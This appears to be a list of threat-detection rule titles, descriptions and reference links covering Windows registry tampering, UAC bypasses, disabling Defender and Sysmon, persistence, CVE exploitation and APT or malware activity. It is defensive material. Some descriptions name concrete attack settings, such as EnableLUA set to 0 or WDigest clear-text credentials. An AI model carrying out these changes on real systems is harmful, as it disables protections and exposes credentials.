https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a, https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password, https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/ |
Scheduled TaskCache Change by Uncommon Program |
Monitors the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious. |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://labs.f-secure.com/blog/scheduled-task-tampering/ |
Potential Registry Persistence Attempt Via Windows Telemetry |
Detects potential persistence behavior using the Windows telemetry registry key.
Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collection.
This binary was created to be easily extensible, and to that end it relies on the registry to tell it which commands to run.
The problem is that it will run any arbitrary command without restriction of location or type.
|
https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ |
RDP Sensitive Settings Changed to Zero |
Detects tampering of RDP Terminal Service/Server sensitive settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'.
|
https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html, http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/, https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03, https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html, https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/, http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/, https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services |
RDP Sensitive Settings Changed |
Detects tampering of RDP Terminal Service/Server sensitive settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'.
|
https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html, http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/, https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03, https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html, https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/, http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/, https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services, https://blog.sekoia.io/darkgate-internals/, https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry, https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry |
New TimeProviders Registered With Uncommon DLL Name |
Detects processes setting a new DLL in DllName under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
Adversaries may abuse time providers to execute DLLs when the system boots.
The Windows Time service (W32Time) enables time synchronization across and within domains.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md |
Old TLS1.0/TLS1.1 Protocol Version Enabled |
Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key. |
https://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947 |
COM Hijacking via TreatAs |
Detects modification of the TreatAs key to enable the "rundll32.exe -sta" command. |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md, https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s |
Potential Signing Bypass Via Windows Developer Features - Registry |
Detects the enablement of developer features such as "Developer Mode" or "Application Sideloading", which allows the user to install untrusted packages. |
https://twitter.com/malmoeb/status/1560536653709598721, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ |
UAC Bypass via Event Viewer |
Detects a UAC bypass method using the Windows Event Viewer. |
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/, https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100 |
UAC Bypass via Sdclt |
Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53) |
https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/, https://github.com/hfiref0x/UACME |
UAC Bypass Abusing Winsat Path Parsing - Registry |
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using Windows Media Player - Registry |
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) |
https://github.com/hfiref0x/UACME |
UAC Disabled |
Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
|
https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md |
UAC Notification Disabled |
Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value.
UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.
When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
|
https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md, https://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/ |
UAC Secure Desktop Prompt Disabled |
Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value.
The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.
When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
|
https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md |
VBScript Payload Stored in Registry |
Detects VBScript content stored in registry keys, as seen being used by the UNC2452 group. |
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ |
Wdigest Enable UseLogonCredential |
Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials |
https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html, https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649, https://github.com/redcanaryco/atomic-red-team/blob/73fcfa1d4863f6a4e17f90e54401de6e30a312bb/atomics/T1112/T1112.md#atomic-test-3---modify-registry-to-store-logon-credentials |
Execution DLL of Choice Using WAB.EXE |
This rule detects that the path to the DLL written in the registry is different from the default one. When launched, WAB.exe tries to load the DLL from the registry. |
https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml, https://twitter.com/Hexacorn/status/991447379864932352, http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ |
Disable Windows Defender Functionalities Via Registry Keys |
Detects when attackers or tools disable Windows Defender functionalities via the Windows registry |
https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/, https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105, https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker, https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html, https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html, https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html, https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/ |
Winget Admin Settings Modification |
Detects changes to the AppInstaller (winget) admin settings, such as enabling local manifest installations or disabling installer hash checks |
https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget, https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCommonCore/Public/winget/AdminSettings.h#L13 |
Enable Local Manifest Installation With Winget |
Detects changes to the AppInstaller (winget) policy, specifically the activation of local manifest installation, which allows a user to install new packages via custom manifests. |
https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget |
Winlogon Notify Key Logon Persistence |
Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.
Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell |
Winlogon AllowMultipleTSSessions Enable |
Detects when the 'AllowMultipleTSSessions' value is enabled, which allows multiple Remote Desktop connection sessions to be opened at once.
This is often used by attackers as a way to connect to an RDP session without disconnecting the other users.
|
http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html |
Sysmon Configuration Change |
Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or of someone trying to manipulate the configuration |
https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon |
Sysmon Configuration Error |
Detects when an adversary is trying to hide its actions from Sysmon logging, based on error messages |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html |
Sysmon Configuration Modification |
Detects when an attacker tries to hide from Sysmon by disabling or stopping it |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html |
Sysmon Blocked Executable |
Triggers on any Sysmon "FileBlockExecutable" event, which indicates a violation of the configured block policy |
https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e |
Sysmon Blocked File Shredding |
Triggers on any Sysmon "FileBlockShredding" event, which indicates a violation of the configured shredding policy. |
https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon |
Sysmon File Executable Creation Detected |
Triggers on any Sysmon "FileExecutableDetected" event, which is generated every time a PE monitored by the configuration is created. |
https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon, https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36 |
WMI Event Subscription |
Detects the creation of a WMI event subscription, a known persistence method |
https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-19-wmievent-wmieventfilter-activity-detected, https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-20-wmievent-wmieventconsumer-activity-detected, https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-21-wmievent-wmieventconsumertofilter-activity-detected |
Suspicious Scripting in a WMI Consumer |
Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers |
https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/, https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19, https://github.com/RiccardoAncarani/LiquidSnake |
Suspicious Encoded Scripts in a WMI Consumer |
Detects suspicious encoded payloads in WMI Event Consumers |
https://github.com/RiccardoAncarani/LiquidSnake |
Rejetto HTTP File Server RCE |
Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287 |
https://vk9-sec.com/hfs-code-execution-cve-2014-6287/, https://www.exploit-db.com/exploits/39161, https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md |
CVE-2010-5278 Exploitation Attempt |
MODx manager - Local File Inclusion: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier,
when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
|
https://github.com/projectdiscovery/nuclei-templates |
ZxShell Malware |
Detects a ZxShell start via its well-known called function name |
https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100, https://pub-7cb8ac806c1b4c4383e585c474a24719.r2.dev/116309e7121bc8b0e66e4166c06f7b818e1d3629.pdf |
Turla Group Lateral Movement |
Detects automated lateral movement by Turla group |
https://securelist.com/the-epic-turla-operation/65545/ |
Turla Group Commands May 2020 |
Detects commands used by Turla group as reported by ESET in May 2020 |
https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf |
Exploit for CVE-2015-1641 |
Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641 |
https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/, https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100 |
Exploit for CVE-2017-0261 |
Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262 |
https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html |
Droppers Exploiting CVE-2017-11882 |
Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe |
https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100, https://www.linkedin.com/pulse/exploit-available-dangerous-ms-office-rce-vuln-called-thebenygreen-, https://github.com/embedi/CVE-2017-11882 |
Exploit for CVE-2017-8759 |
Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759 |
https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100, https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 |
Adwind RAT / JRAT |
Detects javaw.exe in AppData folder as used by Adwind / JRAT |
https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100, https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf |
CosmicDuke Service Installation |
Detects the installation of a service named "javamtsup" on the system.
The CosmicDuke info stealer uses Windows services typically named "javamtsup" for persistence.
|
https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf |
Fireball Archer Install |
Detects Archer malware invocation via rundll32 |
https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/, https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100 |
Malware Shellcode in Verclsid Target Process |
Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro |
https://twitter.com/JohnLaTwC/status/837743453039534080 |
NotPetya Ransomware Activity |
Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via a named pipe, the file system journal of drive C is deleted, and Windows event logs are cleared using wevtutil |
https://securelist.com/schroedingers-petya/78870/, https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100 |
Potential PlugX Activity |
Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location |
http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/, https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/ |
StoneDrill Service Install |
Detects a service install of the malicious "Microsoft Network Realtime Inspection Service" service described in the StoneDrill report by Kaspersky |
https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/ |
WannaCry Ransomware Activity |
Detects WannaCry ransomware activity |
https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 |
Potential APT10 Cloud Hopper Activity |
Detects potential process and execution activity related to APT10 Cloud Hopper operation |
https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf |
Ps.exe Renamed SysInternals Tool |
Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report |
https://www.us-cert.gov/ncas/alerts/TA17-293A |
Equation Group C2 Communication |
Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools |
https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195 |
Lazarus System Binary Masquerading |
Detects binaries used by the Lazarus group which use system binary names but are executed and launched from a non-default location |
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf |
Turla Group Named Pipes |
Detects a named pipe used by Turla group samples |
Internal Research, https://attack.mitre.org/groups/G0010/ |
Turla Service Install |
Detects a service install of the malicious services mentioned in the Carbon Paper - Turla report by ESET |
https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/ |
Turla PNG Dropper Service |
Detects the malicious services mentioned in the Turla PNG dropper report by NCC Group in November 2018 |
https://research.nccgroup.com/2018/11/22/turla-png-dropper-is-back/ |
Fortinet CVE-2018-13379 Exploitation |
Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs |
https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/ |
Oracle WebLogic Exploit |
Detects access to a webshell dropped into a keystore folder on the WebLogic server |
https://twitter.com/pyn3rd/status/1020620932967223296, https://github.com/LandGrey/CVE-2018-2894 |
Elise Backdoor Activity |
Detects Elise backdoor activity used by APT32 |
https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting, https://web.archive.org/web/20200302083912/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf |
APT27 - Emissary Panda Activity |
Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27 |
https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965, https://twitter.com/cyb3rops/status/1168863899531132929, https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/ |
Sofacy Trojan Loader Activity |
Detects Trojan loader activity as used by APT28 |
https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/, https://www.hybrid-analysis.com/sample/ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8?environmentId=110, https://twitter.com/ClearskySec/status/960924755355369472 |
APT29 2018 Phishing Campaign File Indicators |
Detects file indicators of the APT29 (Cozy Bear) phishing campaign as reported by Mandiant |
https://twitter.com/DrunkBinary/status/1063075530180886529, https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign |
APT29 2018 Phishing Campaign CommandLine Indicators |
Detects command line indicators of the APT29 (Cozy Bear) phishing campaign as reported by Mandiant |
https://twitter.com/DrunkBinary/status/1063075530180886529, https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/, https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign |
OceanLotus Registry Activity |
Detects registry keys created in OceanLotus (also known as APT32) attacks |
https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/, https://github.com/eset/malware-ioc/tree/master/oceanlotus |
Potential MuddyWater APT Activity |
Detects potential Muddywater APT activity |
https://www.mandiant.com/resources/blog/iranian-threat-group-updates-ttps-in-spear-phishing-campaign |
OilRig APT Activity |
Detects OilRig activity as reported by Nyotron in their March 2018 report |
https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf |
OilRig APT Registry Persistence |
Detects OilRig registry persistence as reported by Nyotron in their March 2018 report |
https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf |
OilRig APT Schedule Task Persistence - Security |
Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report |
https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf |
OilRig APT Schedule Task Persistence - System |
Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report |
https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf |
Defrag Deactivation |
Detects the deactivation and disabling of the scheduled defragmentation task, as seen used by the Slingshot APT group |
https://securelist.com/apt-slingshot/84312/ |
Defrag Deactivation - Security |
Detects the deactivation and disabling of the scheduled defragmentation task, as seen used by the Slingshot APT group |
https://securelist.com/apt-slingshot/84312/ |
TropicTrooper Campaign November 2018 |
Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia |
https://www.microsoft.com/en-us/security/blog/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/ |
Potential BearLPE Exploitation |
Detects potential exploitation of the BearLPE exploit, which uses the Task Scheduler ".job" import arbitrary DACL write |
https://github.com/djhohnstein/polarbearrepo/blob/f26d3e008093cc5c835e92a7165170baf6713d43/bearlpe/polarbear/polarbear/exploit.cpp |
Pulse Secure Attack CVE-2019-11510 |
Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole |
https://www.exploit-db.com/exploits/47297 |
Exploiting SetupComplete.cmd CVE-2019-1378 |
Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378 |
https://web.archive.org/web/20200530031708/https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua |
Citrix Netscaler Attack CVE-2019-19781 |
Detects CVE-2019-19781 exploitation attempts against Citrix Netscaler, Application Delivery Controller and Citrix Gateway |
https://support.citrix.com/article/CTX267679, https://support.citrix.com/article/CTX267027, https://isc.sans.edu/diary/25686, https://twitter.com/mpgn_x64/status/1216787131210829826, https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md |
Exploiting CVE-2019-1388 |
Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM |
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388, https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege |
Potential Baby Shark Malware Activity |
Detects activity that could be related to Baby Shark malware |
https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ |
Confluence Exploitation CVE-2019-3398 |
Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398 |
https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181 |
Chafer Malware URL Pattern |
Detects HTTP request used by Chafer malware to receive data from its C2. |
https://securelist.com/chafer-used-remexi-malware/89538/ |
Potential Dridex Activity |
Detects potential Dridex activity via specific process patterns |
https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3, https://redcanary.com/threat-detection-report/threats/dridex/ |
Potential Dtrack RAT Activity |
Detects potential Dtrack RAT activity via specific process patterns |
https://securelist.com/my-name-is-dtrack/93338/, https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/, https://www.cyberbit.com/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/, https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/, https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/ |
Potential Emotet Activity |
Detects all Emotet-like process executions that are not covered by the more generic rules |
https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/, https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/, https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/, https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/ |
Formbook Process Creation |
Detects Formbook-like process executions that inject code into a set of files in the System32 folder, which then execute a special command line to delete the dropper from the AppData Temp folder. False positives are avoided by excluding all parent processes with command line parameters. |
https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer, https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/, https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/, https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/ |
LockerGoga Ransomware Activity |
Detects LockerGoga ransomware activity via specific command line. |
https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a, https://blog.f-secure.com/analysis-of-lockergoga-ransomware/, https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/ |
Potential QBot Activity |
Detects potential QBot activity by looking for process executions used previously by QBot |
https://twitter.com/killamjr/status/1179034907932315648, https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/ |
Potential Ryuk Ransomware Activity |
Detects Ryuk ransomware activity |
https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/, https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/ |
Potential Snatch Ransomware Activity |
Detects specific process characteristics of Snatch ransomware word document droppers |
https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ |
Ursnif Malware C2 URL Pattern |
Detects Ursnif C2 traffic. |
https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html |
Ursnif Malware Download URL Pattern |
Detects download of Ursnif malware done by dropper documents. |
https://notebook.community/Cyb3rWard0g/HELK/docker/helk-jupyter/notebooks/sigma/proxy_ursnif_malware |
Potential Ursnif Malware Activity - Registry |
Detects registry keys related to Ursnif malware. |
https://blog.yoroi.company/research/ursnif-long-live-the-steganography/, https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/ |
Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 |
Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local |
https://pbs.twimg.com/media/EF3yLGoWkAEGeLa?format=jpg |
APT31 Judgement Panda Activity |
Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report |
https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html |
APT40 Dropbox Tool User Agent |
Detects suspicious user agent string of APT40 Dropbox tool |
Internal research from Florian Roth |
Potential Russian APT Credential Theft Activity |
Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike |
https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html |
Potential EmpireMonkey Activity |
Detects potential EmpireMonkey APT activity |
https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/, https://malpedia.caad.fkie.fraunhofer.de/actor/anthropoid_spider |
Equation Group DLL_U Export Function Load |
Detects a specific export function name used by one of EquationGroup tools |
https://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=, https://twitter.com/cyb3rops/status/972186477512839170 |
Mustang Panda Dropper |
Detects specific process parameters as used by Mustang Panda droppers |
https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/, https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/, https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations |
Operation Wocao Activity |
Detects activity mentioned in Operation Wocao report |
https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/, https://twitter.com/SBousseaden/status/1207671369963646976 |
Operation Wocao Activity - Security |
Detects activity mentioned in Operation Wocao report |
